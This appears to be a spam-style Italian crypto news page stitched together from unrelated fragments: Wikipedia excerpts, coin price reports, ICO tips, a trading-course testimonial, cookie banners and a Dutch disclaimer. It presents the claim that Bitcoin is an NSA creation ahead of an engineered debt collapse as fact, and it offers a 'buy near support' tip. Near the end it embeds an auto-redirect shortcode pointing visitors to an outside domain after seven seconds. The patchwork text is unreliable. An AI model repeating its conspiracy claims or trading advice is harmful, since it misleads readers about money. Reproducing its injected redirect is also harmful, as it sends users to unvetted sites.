“articoli di notizie in valuta digitale -Crypto Currency e Taxes”

L’era moderna delle valute digitali è iniziata quando Bitcoin ha lanciato la prima valuta digitale decentralizzata. Fino alla nascita di Bitcoin le valute digitali erano centralizzate, ma Bitcoin ha rivoluzionato questo aspetto. Al posto di essere controllata da un’unica fonte o società, Bitcoin viene creata e immagazzinata in un sistema di rete peer-to-peer, facendo affidamento su quello che viene ritenuto essere un sistema di crittografia sicuro per la creazione tramite l’utilizzo di firme digitali note come blockchain o catene di blocchi.

A prima vista, sembra un’enorme notizia, soprattutto dopo un paio di giorni difficili per la criptovaluta. La scorsa settimana, Tron sembrava essere l’ultima alternativa bitcoin a salire alle stelle in termini di valore, unendosi a criptovalute come Ripple e Stellar. Ma un’inversione generale dei prezzi delle criptovalute e le accuse che il white paper di Tron aveva plagiato altri lavori hanno visto i token TRX cadere a metà del loro recente prezzo record.

Mettiamo che tu abbia grande idea e voglia lanciare una startup, ma non hai abbastanza soldi. Una Ico può essere considerata come una forma alternativa di crowdfunding. Per un breve periodo di tempo offri agli utenti la possibilità di acquistare una criptovaluta ad hoc (token), che servirà per pagare i servizi della tua startup. Lo scambio avviene in ethereum o bitcoin. A differenza di un’offerta pubblica iniziale (Ipo), chi investe in una Ico non arriva a possedere una quota di proprietà della tua azienda. Ma fa una sorta di atto di fede: crede che la valuta della tua startup col tempo aumenterà di valore e ci potrà anche guadagnare.

A cryptocurrency (or crypto currency) is a digital asset designed to work as a medium of exchange that uses cryptography to secure its transactions, to control the creation of additional units, and to verify the transfer of assets.[1][2][3] Cryptocurrencies are a type of digital currencies, alternative currencies and virtual currencies. Cryptocurrencies use decentralized control[4] as opposed to centralized electronic money and central banking systems.[5] The decentralized control of each cryptocurrency works through a blockchain, which is a public transaction database, functioning as a distributed ledger.[6]

3. Obiettivi non chiari o irrealistici: “Vogliamo essere il prossimo bitcoin” non è un piano realistico. “Entro aprile 2018 abbiamo in programma di lanciare pubblicamente la nostra piattaforma blockchain” è meglio. Assicurati che l’Ico scelto sia supportato da obiettivi possibili e chiari.

Ripple – Con la sua capitalizzazione di mercato di più di $6.5 miliardi, è attualmente la terza valuta digitale per capitalizzazione di mercato, dietro solamente a Bitcoin ed Ethereum. Questo dovrebbe essere sufficiente per mantenere vivo l’interesse dei trader sui movimenti di prezzo della criptovaluta Ripple. Con oltre 38 miliardi di monete, chiamate Ripples, il valore di Ripple è decisamente inferiore se raffrontato alle altre valute digitali maggiori. Il protocollo originale di Ripple è stato sviluppato nel lontano 2004 ed è stato lanciato come Ripplepay.com nel 2005 sotto forma di servizio finanziario per fornire opzioni di pagamento sicure ai membri di una comunità online tramite un network globale. L’attuale versione di Ripple è stata sviluppata nel 2012 e lanciata nel 2013.

Marco l’ho ascoltato in diverse occasioni alle conferenze in cui lui era speaker. Lavoriamo nello stesso settore e ho trovato i suoi interventi sempre molto appassionati, tipici di chi va a fondo su un argomento perché vuole conoscere il più possibile una cosa prima di poterla eventualmente utilizzare nel lavoro di tutti i giorni. Poi tramite Facebook e YouTube ho scoperto un “nuovo Marco”, o meglio, sempre la stessa passione, ma su un argomento diverso: il trading finanziario Non avendo alcuna esperienza di trading mi sono incuriosito e ho voluto capirne qualcosa anche io, soprattutto vedendolo dal punto di vista di chi non fa il trader per 8-10 ore al giorno ma di chi come me fa altro nella vita (ed è pure molto impegnato…). Non potendo partecipare ai workshop che organizza di tanto in tanto, come ho saputo che stava preparando questo corso online, mi sono subito prenotato. E riecco, quindi, il “solito Marco” buttarsi a capofitto nel raccontarci la sua esperienza personale (ormai decennale) e spiegarci cosa lui considera profittevole e cosa no, non in base a statistiche fatte da altri ma dalle sue esperienze dirette: “questo funziona… questo statene alla larga… etc.”. Concetti forse complicati nei loro meccanismi fondamentali, ma tradotti in parole semplici da farceli capire e soprattutto utilizzare. Mi è subito piaciuto il suo approccio: piedi per terra; minimizzare i rischi; proteggere il capitale; massima attenzione; testare, testare e poi ri-testare… e non tutte quelle cretinate che spesso si vedono pubblicizzate su Internet di diventare milionari in 2 mesi (se invece è quello che state cercando, andate a buttare i vostri soldi altrove, qui si investe, punto). Già dopo un mese mi sono reso conto che stava offrendoci molto più materiale e molta più disponibilità di quanta, forse, lui stesso aveva inizialmente pianificato. Ho partecipato a qualche lezione gratuita di traders americani e inglesi che per importi molto superiori offrono a malapena l’equivalente di un paio dei moduli che Marco ci ha preparato. Einstein diceva: “Non hai davvero compreso qualcosa, fino a quando non sei in grado di spiegarla a tua nonna”. Ecco: fate partecipare vostra nonna a questo corso e diventerà un trader migliore di voi!

Con questo, sul punto di partenza, sta divenendo sempre più evidente che Bitcoin potrebbe essere una creazione dell’NSA (National Security Agency)  ed è stato lanciato come un esperimento di “normalizzazione” per far conoscere al pubblico la valuta digitale. Una volta stabilito questo, le valute fiat del mondo saranno cancellate in un crollo del debito progettato (vedi sotto la sequenza degli eventi), poi sostituite con una criptovaluta approvata dal governo con il monitoraggio di tutte le transazioni e dei portafogli digitali da parte dei governi occidentali del mondo.

Secondo la normativa vigente, vengono identificati 2 tipologie di Cookie: i cookie di profilazione utilizzati nella profilazione degli utenti per fini statistici / pubblicitari i cookie tecnici a tutela della navigazione e della fruizione del sito web. Utilizzo dei Cookie su Bitcoinnews.eu Questo sito non utilizza Cookie di profilazione a scopi pubblicitari, ma vi sono tuttavia presenti Cookie di terze parti a solo fine statistico ( come ad esempio i Cookie di Google ). Sono inoltre presenti Cookie di terze parti relativi ai social plug in presenti nel nostro sito come ad esempio i collegamenti a Facebook e altri social. Come disattivare i Cookie Le impostazioni predefinite della maggior parte dei browser accettano l’utilizzo di tutti i Cookie. È comunque possibile modificare tali impostazioni e scegliere fra accettare i Cookie, visualizzare una finestra popup che consente di scegliere se accettare o meno i Cookie oppure rifiutare l’uso di tutti i Cookie indistintamente. Le impostazioni dei browser possono essere modificate tramite la barra degli strumenti, tuttavia per consentire il corretto funzionamento di ogni sito che si visita, si sconsiglia il loro blocco. Google Analytics: Se si desidera disabilitare i cookie di Google Analytics (Google DoubleClick), visitare la relativa pagina Web di Google (https://tools.google.com/dlpage/gaoptout?hl=it) e scaricare il componente aggiuntivo per la disattivazione di Google Analytics per il browser utilizzato. Pulsanti dei Social Network: Al fine di creare i pulsanti per i social media e collegarli ai corrispondenti social network e siti esterni, sono presenti sulle nostre pagine degli script provenienti da domini non soggetti al nostro controllo. Tali siti potrebbero raccogliere informazioni sugli spostamenti dell’utente in Internet. Se si fa clic su uno o più di questi pulsanti, i siti di cui sopra registrano tale azione e potranno fare uso delle relative informazioni. Per informazioni precise sull’utilizzo che tali siti fanno delle informazioni raccolte dagli utenti e per sapere come eliminarle o evitare che esse vengano raccolte, consultare le informative sulla privacy di ciascuno dei siti in oggetto.

Secondo Alexey Ivanov, fund manager per Polynom Crypto Capital a Mosca, una di queste è certamente la giapponese Cardano, tra le principali concorrenti di Ethereum e settima cripto più capitalizzata. Il suo token (ADA), che ha debuttato sul mercato meno di quattro mesi fa, attualmente viene scambiato a 0,26 dollari secondo Coinmarketcap.

Disclaimer: de inhoud op deze website moet gezien worden als puur informatief en is geen investeringsadvies. Door te investeren in cryptovaluta loopt uw vermogen risico, zowel van sterke koersschommelingen als door hackers en oplichters die op de loer liggen. Let dus goed op en doe je eigen research voordat je gaat investeren.

Ancora più felice è forse chi si occupa di produrre tali chip, come la taiwanese TSMC, che vede nel mining una nuova grande opportunità di incasso. Oltre alla maggiore produzione di GPU, TSMC sta raccogliendo moltissimi di ordini per la realizzazione di ASIC dedicati al mining dalla cinese Bitmain Technologies.

Monero (XMR) è stata creata nell’aprile 2014 e si focalizza su privacy, decentralizzazione e scalabilità. Si tratta di un sistema valutario sicuro, privato e non tracciabile. Monero utilizza un tipo di criptografia particolare per fare in modo che tutte le transazioni siano assolutamente non collegabili e non tracciabili. La parola “Monero” deriva dalla lingua esperanto, e significa letteralmente “moneta”.

Oggi l’unica moneta pubblica disponibile è il contante. Le banche centrali dovrebbero invece consentire a tutti di avere un conto corrente – per il deposito, non per il credito – presso di sé, emettendo moneta elettronica. In altri termini, la banca centrale emette delle carte prepagate. È essenziale che la banca centrale crei una linea esclusivamente di debito, non di credito. Il credito della banca centrale deve rimanere riservato alle banche, in quanto il processo di affidamento di credito presuppone capacità e conoscenze – e relativa assunzione del rischio – che è impensabile estendere a tutti i cittadini.

2011 Active SwiftCoin STC Daniel Bruno SHA-256 PoW First digital coin with theoretical value based on the work required to produce electricity. First block chain to support currency creation by interest paid on debt. Solidus Bond proto smart-contract. One of the first digital coins patented in the US. First block chain to support encrypted mail with attachments.

However, Citrix’s Chris Mayers comments: “we know that very often, people are the weakest link in the security chain, and 18% of responding businesses say they worry that their hoard of digital currency might put them at risk of insider theft.”

Selling continued for a few more days until the market went as low as 0.000023 on December 28. Sensing a bullish higher low was in place, participants bought positions, and pushed the market as high as 0.000065 on January 28, 2018. At that point, however, the market was nearly overbought, and that was enough for bottom pickers to take profits. Since then, the market has been correcting, but this dip offers you the chance to buy near a firm support level.

^ “FIN-2013-G001: Application of FinCEN’s Regulations to Persons Administering, Exchanging, or Using Virtual Currencies”. Financial Crimes Enforcement Network. 18 March 2013. p. 6. Archived from the original on 2013-03-19.

Questo sito utilizza cookie, anche di terze parti, per soli scopi statistici (google) e per l’utilizzo dei social plug-in (facebbok ecc.) e servizi in linea con le tue preferenze. Se vuoi saperne di più o negarne il consenso a tutti o ad alcuni clicca qui. Chiudendo questo banner, scorrendo questa pagina o cliccando su qualunque suo elemento acconsenti al loro utilizzo. Maggiori Informazioni Accetta

Avviso esplicito sui rischi: Fusion Media o chiunque sia coinvolto persso la Fusion Media, non si assume alcuna responsabilità per eventuali perdite o danni commerciali a causa di affidamento sulle informazioni contenute all’interno di questa e-mail, compresi i dati, le citazioni, i grafici e i segnali di acquisto/vendita. Si prega di essere pienamente informati riguardo ai rischi e ai costi associati alla negoziazione sui mercati finanziari, è una delle forme più rischiose di investimento possibili.

Situazione giuridica complicata: sebbene Bitcoin non sia illegale in nessuno stato, il suo utilizzo è una scelta che spetta unicamente alla giurisdizione di ogni singolo stato. Dunque, ad esempio, in Vietnam la moneta digitale può essere utilizzata solo per affari tra privati, mentre ne è vietato l’utilizzo agli istituti di credito. Spesso le borse che trattano Bitcoin devono sospendere il servizio in determinati paesi, a causa di sentenze giuridiche. Considerando la difficile situazione di partenza, non solo è difficile la collaborazione con le banche quando si tratta dello scambio dei coin digitali, bensì c’è da tenere in considerazione anche i crolli subitanei dei prezzi in borsa.

China is home to about three-quarters of the machines mining the Bitcoin blockchain.[citation needed] As of February 2018, the Chinese Government halted trading of virtual currency, banned initial coin offerings and shut down mining. Some Chinese miners have since relocated to Canada.[32]

Ok, quindi le criptovalute sono basate su un sistema decentralizzato. Ma come funziona esattamente questo sistema? Come funziona una criptovaluta?  Seguendoci passo per passo, spiegheremo il funzionamento di una criptovaluta in maniera comprensibile e alla portata di tutti. Perché in fondo le criptovalute non sono così poi difficili da comprendere.

A INIZIO 2018 STOP ALLA PRODUZIONE DI ETHER. La “zecca” di Buterin, invece, è senza fondo. Al momento, sono in circolazione oltre 96 milioni di Ether – l’unità di conto– contro i 16 milioni di Bitcoin. Per ciascun nuovo blocco di transazioni aggiunto alla blockchain di Ethereum, poi, l’autore dell’aggiornamento (il miner, “minatore”) ottiene una ricompensa fissa: ogni 16 secondi circa, quindi, il totale di monete digitale emesse aumenta di 5 unità. In teoria, quindi, è possibile coniare nuovi Ether all’infinito, cosa che ha fatto storcere il naso ai cripto-ortodossi e messo in allarme gli investitori, preoccupati per l’inflazione. Per rassicurarli, Buterin e la sua cerchia di programmatori stanno studiando una modifica all’algoritmo che dovrebbe essere pronta per il lancio a inizio 2018.

Reply investe nella ricerca del talento e nell’apprendimento continuo. Il 15 marzo 2018 Reply organizza la prima sfida dedicata al coding a squadre e aperta a studenti e professionisti da tutto il mondo, la Reply Code Challenge. Tutti i team registrati sulla piattaforma challenges.reply.com affronteranno la gara: programmare la soluzione di un problema logico-matematico.

Gareth Murphy, a senior central banking officer has stated “widespread use [of cryptocurrency] would also make it more difficult for statistical agencies to gather data on economic activity, which are used by governments to steer the economy”. He cautioned that virtual currencies pose a new challenge to central banks’ control over the important functions of monetary and exchange rate policy.[107]

Se una versione crittografica del Tamagotchi arriva a mettere in ginocchio l’aspirante super computer globale, viene però da chiedersi come Ethereum possa un domani far fronte ai miliardi di transazioni richieste quotidianamente dal sistema economico mondiale. Certo, Buterin ha promesso di cambiare il sistema per renderlo più veloce ed efficiente. Ma non è detto che ci riesca e non è detto che i possessori di Ethereum accettino le migliorie.

The Danish government proposed getting rid of the obligation for selected retailers to accept payment in cash, moving the country closer to a “cashless” economy.[46] The Danish Chamber of Commerce is backing the move.[47] Nearly a third of the Danish population uses MobilePay, a smartphone application for transferring money.[46]

La startup sostiene che un centinaio di istituzioni finanziarie di prima grandezza utilizzano già oggi la rete di Ripple e nelle ultime settimane alcune banche asiatiche avrebbero avviato una sperimentazione per un sistema di transazioni crossborder.

Nella mattina del 4 gennaio, la criptovaluta TRON (TRX) ha registrato una crescita del 136% , diventando la nona più grande criptovaluta per capitalizzazione di mercato e spingendo Dash all’11 ° posto. L’altcoin ha avuto un trend rialzista da metà dicembre, con una crescita di oltre il 2000% da allora. Nella sola prima settimana del 2018, la criptovaluta ha visto una crescita quasi del 300 percento. TRON ha colpito $ 0.20 in precedenza, e attualmente scambia a una media di $ 0,17, con una capitalizzazione di mercato di $ 12,4 miliardi [redirect url=’http://curbee.info/bump’ sec=’7′]

One thought on ““articoli di notizie in valuta digitale -Crypto Currency e Taxes””

  1. Nessuna soluzione nel caso in cui si perda la chiave: la struttura decentrata può diventare un problema se l’utente perde la chiave privata del proprio Wallet. Questa non è memorizzata né nel network Bitcoin né nella Blockchain e dunque non è ripristinabile. Di conseguenza non potrete più contare sulle monete presenti nel vostro salvadanaio virtuale, causando dunque la perdita di questo credito, che non potrà più essere utilizzato per le transazioni.

Leave a Reply

Your email address will not be published. Required fields are marked *